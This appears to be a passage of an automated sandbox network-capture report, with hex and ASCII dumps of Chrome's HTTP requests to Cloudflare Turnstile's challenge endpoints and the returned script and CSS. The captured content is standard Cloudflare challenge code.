                                                            2025-01-15 16:02:05 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                            Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                            2025-01-15 16:02:05 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                            Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                            2025-01-15 16:02:05 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                            Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                            2025-01-15 16:02:05 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                            Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                            2025-01-15 16:02:05 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                            Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                            2025-01-15 16:02:05 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                            Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                            2025-01-15 16:02:05 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                            Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.1649724104.18.95.414436356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 16:02:05 UTC798OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/09y8e/0x4AAAAAAA5J-xX8Izs2GVzM/auto/fbE/normal/auto/ HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            sec-ch-ua-platform: "Windows"
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: navigate
                                                            Sec-Fetch-Dest: iframe
                                                            Referer: https://mstn.qomitarnor.ru/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-15 16:02:05 UTC1362INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 16:02:05 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 26635
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                            content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                            cross-origin-embedder-policy: require-corp
                                                            cross-origin-opener-policy: same-origin
                                                            cross-origin-resource-policy: cross-origin
                                                            origin-agent-cluster: ?1
                                                            accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                            critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                            referrer-policy: same-origin
                                                            document-policy: js-profiling
                                                            2025-01-15 16:02:05 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 39 30 32 37 31 36 39 30 39 39 34 39 31 37 62 35 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                            Data Ascii: Server: cloudflareCF-RAY: 90271690994917b5-EWRalt-svc: h3=":443"; ma=86400
                                                            2025-01-15 16:02:05 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                            2025-01-15 16:02:05 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                            Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                            2025-01-15 16:02:05 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                            Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                            2025-01-15 16:02:05 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                            Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                            2025-01-15 16:02:05 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                            Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                            2025-01-15 16:02:05 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                            Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                            2025-01-15 16:02:05 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                            Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                            2025-01-15 16:02:05 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                            Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                            2025-01-15 16:02:05 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                            Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.1649726104.18.95.414436356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 16:02:06 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=90271690994917b5&lang=auto HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/09y8e/0x4AAAAAAA5J-xX8Izs2GVzM/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-15 16:02:06 UTC331INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 16:02:06 GMT
                                                            Content-Type: application/javascript; charset=UTF-8
                                                            Content-Length: 119300
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Server: cloudflare
                                                            CF-RAY: 90271694a8cf0f42-EWR
                                                            alt-svc: h3=":443"; ma=86400
